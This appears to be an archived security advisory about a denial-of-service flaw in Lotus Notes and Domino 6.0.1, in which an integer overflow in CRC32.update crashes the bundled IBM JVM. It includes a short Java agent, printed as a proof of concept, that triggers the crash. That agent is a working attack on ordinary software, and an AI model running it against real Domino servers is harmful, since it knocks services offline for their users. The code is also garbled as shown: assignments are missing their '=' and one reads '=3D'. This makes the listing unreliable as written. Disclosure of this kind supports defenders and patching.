COMMAND

	Java Agent freezes Lotus Notes and Domino 6.0.1

SYSTEMS AFFECTED

	 Lotus Notes 6.0.1
	 Lotus Domino 6.0.1

PROBLEM

	Marc Schoenefeld [schonef@uni-muenster.de] found following:
	
	the following agent causes the IBM JVM 1.3.1 shipped with  Lotus  Domino
	6.0.1 and Lotus Notes 6.0.1 to crash. After calling  the  agent  a  huge
	amount of memory is not freed and causes the  server  machine  (observed
	on MS XP) to deny further service.
	
	 IMPLICATIONS
	 ============
	
	 - If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable,
	 - if the agent is run on the server, Lotus Domino 6.0.1 is vulnerable.
	
	
	 ANALYSIS
	 ========
	
	The call to the "update" method of the CRC32 raises an integer  overflow
	in the java java.util.zip.* core libraries which triggers a jni  routine
	that cannot handle the extreme high input value.
	
	
	 HISTORY
	 =======
	
	This vulnerability has already been detected in the Sun JDK
	(http://developer.java.sun.com/developer/bugParade/bugs/4811913.html),
	and was disclosed at Blackhat Windows 2003.
	The background of this bugs is described at www.illegalaccess.org
	
	 AGENT
	 =====
	
	
	import lotus.domino.*;
	import java.util.zip.*;
	
	public class JavaAgent extends AgentBase {
	
	  public void NotesMain() {
	
	    try {
	      Session session getSession();
	      AgentContext agentContext session.getAgentContext();
	      CRC32 crc32 =3D new CRC32();
	      crc32.update(new byte[0], 4, 0x7ffffffc);
	
	      // (Your code goes here)
	
	    } catch(Exception e) {
	      e.printStackTrace();
	    }
	  }
	}
	
	

SOLUTION

	Don't allow agents on server.